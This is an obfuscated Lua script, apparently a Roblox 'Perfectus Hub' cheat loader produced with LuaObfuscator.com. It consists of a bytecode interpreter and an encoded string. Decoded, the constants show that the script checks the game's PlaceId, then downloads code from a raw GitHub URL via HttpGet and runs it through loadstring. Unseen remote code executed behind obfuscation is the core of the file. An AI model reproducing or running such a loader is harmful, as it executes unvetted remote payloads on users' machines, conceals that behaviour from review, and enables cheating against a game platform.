--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v91=0;local v92;while true do if (v91==0) then v92=v5(v81,v19);v19=nil;v91=1;end if (v91==1) then return v92;end end else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=0 -(1637 -(1523 + 114)) ;local v83;while true do if ((0 -0)==v82) then v83=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-((838 + 94) -(857 + 74))) -(v32-(569 -((1244 -(282 + 595)) + 201)))) + (928 -((304 -90) + 713)))) ;return v83-(v83%(1 + 0)) ;end end else local v84=2^(v32-1) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * 256) + v35 ;end local function v23() local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if ((117 -(32 + (435 -(87 + 263))))==v37) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 4 ;v37=1 + 0 ;end if (v37==(958 -(892 + 65))) then return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * (469 -213)) + v38 ;end end end local function v24() local v42=0 -(0 + 0) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(180 -(24 + 43 + 113))) then v43=v23();v44=v23();v42=1 + 0 ;end if (v42==((892 -(261 + 624)) -4)) then if (v47==(0 + (0 -0))) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else local v111=0;while true do if (v111==(952 -(802 + (508 -358)))) then v47=2 -1 ;v45=0;break;end end end elseif (v47==(3712 -1665)) then return ((v46==((1080 -(1020 + 60)) + 0)) and (v48 * ((1 + 0)/(997 -(915 + 33 + 49))))) or (v48 * NaN) ;end return v8(v48,v47-(2896 -1873) ) * (v45 + (v46/((2 + 0)^52))) ;end if (v42==(2 -0)) then v47=v20(v44,1159 -(116 + 1022) ,31);v48=((v20(v44,1219 -(1069 + 118) )==(2 -(3 -2))) and  -(1 -0)) or (3 -2) ;v42=1 + 2 ;end if (v42==(1 -0)) then v45=1 + 0 ;v46=(v20(v44,792 -(368 + (2170 -(760 + 987))) ,62 -42 ) * ((20 -(10 + 8))^(122 -90))) + v43 ;v42=(1867 -(630 + 793)) -((2329 -(1789 + 124)) + 26) ;end end end local function v25(v49) local v50=0;local v51;local v52;while true do if (v50==(767 -(745 + 21))) then v51=v3(v16,v18,(v18 + v49) -((2 -1) + 0) );v18=v18 + v49 ;v50=5 -3 ;end if (v50==(0 -0)) then v51=nil;if  not v49 then local v103=0;while true do if (v103==(0 + 0)) then v49=v23();if (v49==0) then return "";end break;end end end v50=1 + 0 ;end if (v50==(1416 -(447 + 966))) then return v6(v52);end if (v50==(1057 -(87 + (2649 -1681)))) then v52={};for v93=4 -3 , #v51 do v52[v93]=v2(v1(v3(v51,v93,v93)));end v50=3 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0 + 0 ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v53~= #"/") then else local v87=(function() return 0 -0 ;end)();local v88=(function() return;end)();while true do if ((341 -(218 + 123))~=v87) then else v88=(function() return 0;end)();while true do if (v88==(1583 -(1535 + 46))) then v53=(function() return 2 + 0 ;end)();break;end if (v88==(1 + 0)) then for v115= #"}",v58 do local v116=(function() return 560 -(306 + 254) ;end)();local v117=(function() return;end)();local v118=(function() return;end)();local v119=(function() return;end)();while true do if (v116==1) then v119=(function() return nil;end)();while true do if (v117== #"|") then if (v118== #":") then v119=(function() return v21()~=0 ;end)();elseif (v118==2) then v119=(function() return v24();end)();elseif (v118~= #"asd") then else v119=(function() return v25();end)();end v59[v115]=(function() return v119;end)();break;end if (v117~=(0 + 0)) then else local v164=(function() return 0 -0 ;end)();local v165=(function() return;end)();while true do if (v164==(1467 -(899 + 568))) then v165=(function() return 0;end)();while true do if (v165~=(1 + 0)) then else v117=(function() return  #">";end)();break;end if ((0 -0)==v165) then v118=(function() return v21();end)();v119=(function() return nil;end)();v165=(function() return 604 -(268 + 335) ;end)();end end break;end end end end break;end if ((290 -(60 + 230))==v116) then v117=(function() return 0;end)();v118=(function() return nil;end)();v116=(function() return 1;end)();end end end v57[ #"91("]=(function() return v21();end)();v88=(function() return 574 -(426 + 146) ;end)();end if (v88~=(0 + 0)) then else v58=(function() return v23();end)();v59=(function() return {};end)();v88=(function() return 1457 -(282 + 1174) ;end)();end end break;end end end if (v53~=2) then else for v95= #"[",v23() do local v96=(function() return v21();end)();if (v20(v96, #"{", #"/")==0) then local v106=(function() return 0;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v106~=(812 -(569 + 242))) then else local v113=(function() return 0;end)();while true do if (v113==(2 -1)) then v106=(function() return 1 + 1 ;end)();break;end if (v113~=0) then else v109=(function() return nil;end)();v110=(function() return nil;end)();v113=(function() return 1;end)();end end end if (v106==0) then local v114=(function() return 1024 -(706 + 318) ;end)();while true do if (v114==1) then v106=(function() return 1252 -(721 + 530) ;end)();break;end if (v114==(1271 -(945 + 326))) then v107=(function() return 0 -0 ;end)();v108=(function() return nil;end)();v114=(function() return 1;end)();end end end if ((2 + 0)==v106) then while true do if (v107== #"}") then local v120=(function() return 700 -(271 + 429) ;end)();local v121=(function() return;end)();while true do if (v120~=0) then else v121=(function() return 0;end)();while true do if (v121==(1 + 0)) then v107=(function() return 2;end)();break;end if (v121~=0) then else v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==(1086 -(461 + 625))) then local v214=(function() return 1288 -(993 + 295) ;end)();local v215=(function() return;end)();while true do if ((0 + 0)~=v214) then else v215=(function() return 0;end)();while true do if (0==v215) then v110[ #"asd"]=(function() return v22();end)();v110[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v108== #"}") then v110[ #"gha"]=(function() return v23();end)();elseif (v108==(1173 -(418 + 753))) then v110[ #"xxx"]=(function() return v23() -(2^(7 + 9)) ;end)();elseif (v108== #"xnx") then local v224=(function() return 0;end)();local v225=(function() return;end)();while true do if (v224~=0) then else v225=(function() return 0 + 0 ;end)();while true do if (v225==(0 + 0)) then v110[ #"gha"]=(function() return v23() -((1 + 1)^(545 -(406 + 123))) ;end)();v110[ #"http"]=(function() return v22();end)();break;end end break;end end end v121=(function() return 1;end)();end end break;end end end if (v107==2) then local v122=(function() return 1769 -(1749 + 20) ;end)();local v123=(function() return;end)();while true do if (v122==0) then v123=(function() return 0 + 0 ;end)();while true do if (v123~=(1323 -(1249 + 73))) then else v107=(function() return  #"gha";end)();break;end if (v123~=(0 + 0)) then else if (v20(v109, #">", #":")== #".") then v110[1147 -(466 + 679) ]=(function() return v59[v110[2]];end)();end if (v20(v109,2,4 -2 )== #"!") then v110[ #"nil"]=(function() return v59[v110[ #"91("]];end)();end v123=(function() return 2 -1 ;end)();end end break;end end end if (v107== #"91(") then if (v20(v109, #"-19", #"gha")~= #"[") then else v110[ #"xnxx"]=(function() return v59[v110[ #".com"]];end)();end v54[v95]=(function() return v110;end)();break;end if (v107~=(1900 -(106 + 1794))) then else local v125=(function() return 0 + 0 ;end)();local v126=(function() return;end)();while true do if (v125==(0 + 0)) then v126=(function() return 0 -0 ;end)();while true do if (v126~=(2 -1)) then else v107=(function() return  #"|";end)();break;end if (v126~=0) then else v108=(function() return v20(v96,2, #"gha");end)();v109=(function() return v20(v96, #"xnxx",120 -(4 + 110) );end)();v126=(function() return 585 -(57 + 527) ;end)();end end break;end end end end break;end end end end for v97= #",",v23() do v55[v97-#"." ]=(function() return v28();end)();end return v57;end if (v53~=(1427 -(41 + 1386))) then else local v89=(function() return 103 -(17 + 86) ;end)();local v90=(function() return;end)();while true do if (v89~=0) then else v90=(function() return 0;end)();while true do if (v90==(0 + 0)) then v54=(function() return {};end)();v55=(function() return {};end)();v90=(function() return 1 -0 ;end)();end if (v90==2) then v53=(function() return  #"/";end)();break;end if (v90==(2 -1)) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v90=(function() return 2 -0 ;end)();end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[(6 -3) -2 ];local v64=v60[2 + 0 ];local v65=v60[1 + 2 ];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1 -0 ;local v71= -((6 + 60) -(30 + 35));local v72={};local v73={...};local v74=v12("#",...) -(1258 -(1043 + 214)) ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + (3 -2) ];else v76[v85]=v73[v85 + ((1427 -(22 + 192)) -(323 + 889)) ];end end local v77=(v74-v68) + (2 -1) ;local v78;local v79;while true do local v86=580 -(361 + 219) ;while true do if (v86==0) then v78=v66[v70];v79=v78[321 -(53 + 267) ];v86=1 + 0 ;end if (v86==(414 -(15 + 398))) then if (v79<=((1673 -(483 + 200)) -(18 + 964))) then if ((713<=847) and (v79<=(11 -8))) then if (v79<=(1 + 0)) then if ((2154<=4031) and (v79>((1463 -(1404 + 59)) + 0))) then v76[v78[852 -(20 + (2271 -1441)) ]]();else v76[v78[2]]=v76[v78[3 + 0 ]];end elseif (v79>2) then local v129=126 -(116 + 10) ;while true do if ((4615==4615) and (v129==(1 + 0))) then v70=v70 + (739 -(542 + 196)) ;v78=v66[v70];v76[v78[3 -1 ]]=v62[v78[(1 -0) + 2 ]];v70=v70 + 1 ;v129=2;end if ((v129==2) or (33>=3224)) then v78=v66[v70];v76[v78[2 + 0 ]]=v76[v78[2 + 1 ]][v78[4]];v70=v70 + 1 ;v78=v66[v70];v129=(772 -(468 + 297)) -4 ;end if ((v129==(7 -4)) or (3790==500)) then v76[v78[2]]=v76[v78[1554 -(1126 + 425) ]][v76[v78[409 -(118 + 287) ]]];v70=v70 + (3 -2) ;v78=v66[v70];if v76[v78[2]] then v70=v70 + 1 ;else v70=v78[3];end break;end if ((3932==3932) and (v129==(1121 -(118 + 1003)))) then v76[v78[5 -3 ]][v78[380 -(142 + 235) ]]=v78[18 -(576 -(334 + 228)) ];v70=v70 + 1 + 0 ;v78=v66[v70];v76[v78[979 -(553 + 424) ]]=v76[v78[5 -2 ]];v129=1;end end else v76[v78[2]]=v62[v78[3]];end elseif (v79<=(5 + 0)) then if (v79==(4 + 0)) then v76[v78[2]]=v78[2 + 1 ];else v76[v78[1 + 1 ]]=v76[v78[10 -7 ]][v78[3 + 1 ]];end elseif (v79<=((27 -15) -6)) then v70=v78[3];elseif ((89<221) and (v79==(19 -12))) then v76[v78[(6 -2) -2 ]]={};else for v180=v78[2],v78[1 + 2 ] do v76[v180]=nil;end end elseif ((2054>=1421) and (v79<=(62 -49))) then if ((2882==2882) and (v79<=(763 -(239 + 146 + 368)))) then if ((v79==(4 + 5)) or (2029>=3521)) then v76[v78[2]][v78[1332 -(797 + 532) ]]=v78[3 + 1 ];else local v139=v78[1 + 1 ];v76[v139]=v76[v139](v13(v76,v139 + (2 -1) ,v71));end elseif ((v79<=(1213 -(373 + 829))) or (2037>=4642)) then v76[v78[733 -((712 -(141 + 95)) + 255) ]]=v76[v78[3]][v76[v78[1134 -(369 + 761) ]]];elseif (v79==(7 + 5)) then if v76[v78[(2 + 0) -0 ]] then v70=v70 + (1 -(0 -0)) ;else v70=v78[241 -(64 + 174) ];end else local v158=v78[(2 -1) + 1 ];local v159=v76[v78[3 -0 ]];v76[v158 + 1 ]=v159;v76[v158]=v159[v78[340 -(144 + 192) ]];end elseif (v79<=15) then if ((1720<4458) and (v79==(230 -(42 + 174)))) then local v143=0 + 0 + 0 ;local v144;local v145;local v146;local v147;while true do if ((692<3058) and (v143==((2 -1) + 0))) then v71=(v146 + v144) -(1 + 0) ;v147=0;v143=1506 -(363 + 1141) ;end if (v143==(1580 -(1183 + 397))) then v144=v78[5 -3 ];v145,v146=v69(v76[v144](v13(v76,v144 + 1 + 0 ,v78[3 + 0 ])));v143=1976 -(1913 + 62) ;end if (v143==(2 + 0)) then for v207=v144,v71 do local v208=0 -0 ;while true do if ((v208==(1933 -(565 + 1368))) or (3254==1655)) then v147=v147 + 1 ;v76[v207]=v145[v147];break;end end end break;end end else local v148=0 -0 ;local v149;local v150;local v151;local v152;local v153;while true do if (v148==(1667 -(1039 + 438 + 184))) then v70=v78[3];break;end if ((v148==(5 -1)) or (1296==4910)) then v71=(v151 + v153) -(1 + 0 + 0) ;v149=856 -(564 + 292) ;for v209=v153,v71 do v149=v149 + (1 -0) ;v76[v209]=v150[v149];end v70=v70 + (2 -1) ;v78=v66[v70];v153=v78[306 -((343 -99) + 60) ];v148=4 + 1 + 0 ;end if ((v148==(478 -((204 -(92 + 71)) + 435))) or (436>3021)) then v78=v66[v70];v76[v78[1003 -(938 + 63) ]]=v62[v78[3]];v70=v70 + 1 + 0 + 0 ;v78=v66[v70];v76[v78[1127 -(936 + (317 -128)) ]]=v76[v78[3]][v78[2 + 2 ]];v70=v70 + (1614 -(1565 + 48)) ;v148=2 + 1 ;end if (v148==0) then v149=nil;v150,v151=nil;v152=nil;v153=nil;v76[v78[2]]=v62[v78[1141 -(782 + 356) ]];v70=v70 + (268 -(176 + 91)) ;v148=1;end if ((3368==3368) and ((13 -8)==v148)) then v76[v153]=v76[v153](v13(v76,v153 + (1 -0) ,v71));v70=v70 + (1093 -(975 + 117)) ;v78=v66[v70];v76[v78[2]]();v70=v70 + (1876 -(157 + 1718)) ;v78=v66[v70];v148=5 + 1 ;end if (((775 -(574 + 191)) -7)==v148) then v78=v66[v70];v76[v78[2 + 0 ]]=v76[v78[10 -7 ]][v76[v78[1022 -(697 + 321) ]]];v70=v70 + (2 -1) ;v78=v66[v70];v153=v78[(7 -4) -1 ];v150,v151=v69(v76[v153](v13(v76,v153 + (2 -1) ,v78[2 + 1 ])));v148=6 -2 ;end if (v148==(2 -1)) then v78=v66[v70];v153=v78[(628 + 601) -(322 + 905) ];v152=v76[v78[614 -(602 + 9) ]];v76[v153 + (1190 -(449 + (1589 -(254 + 595)))) ]=v152;v76[v153]=v152[v78[876 -(826 + 46) ]];v70=v70 + (948 -(245 + 702)) ;v148=6 -4 ;end end end elseif (v79<=(6 + (136 -(55 + 71)))) then local v154=1898 -(260 + 1638) ;local v155;while true do if (v154==(440 -(382 + 58))) then v155=v78[6 -4 ];v76[v155](v76[v155 + 1 + 0 ]);break;end end elseif (v79==17) then if (v76[v78[3 -1 ]]==v78[11 -7 ]) then v70=v70 + 1 ;else v70=v78[1208 -(902 + 303) ];end else do return;end end v70=v70 + (1 -0) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!093Q00028Q0002400D02A80156D44203563Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F67697A6C69646F7374756D62656E696D2F70687562322F726566732F68656164732F6D61696E2F6173646164736164617364617303043Q0067616D6503073Q00506C6163654964030A3Q006C6F6164737472696E6703073Q00482Q747047657403053Q007072696E7403243Q00506572666563747573204875623A2047616D65206973204E6F742053752Q706F72746564001C3Q0012043Q00014Q0008000100013Q0026113Q0002000100010004063Q000200012Q000700023Q00010030030002000200034Q000100023Q00122Q000200043Q00202Q0002000200054Q00020001000200062Q0002001600013Q0004063Q00160001001202000200063Q00120F000300043Q00202Q00030003000700122Q000500043Q00202Q0005000500054Q0005000100054Q000300056Q00023Q00024Q00020001000100044Q001B0001001202000200083Q001204000300094Q00100002000200010004063Q001B00010004063Q000200012Q00123Q00017Q00",v9(),...);
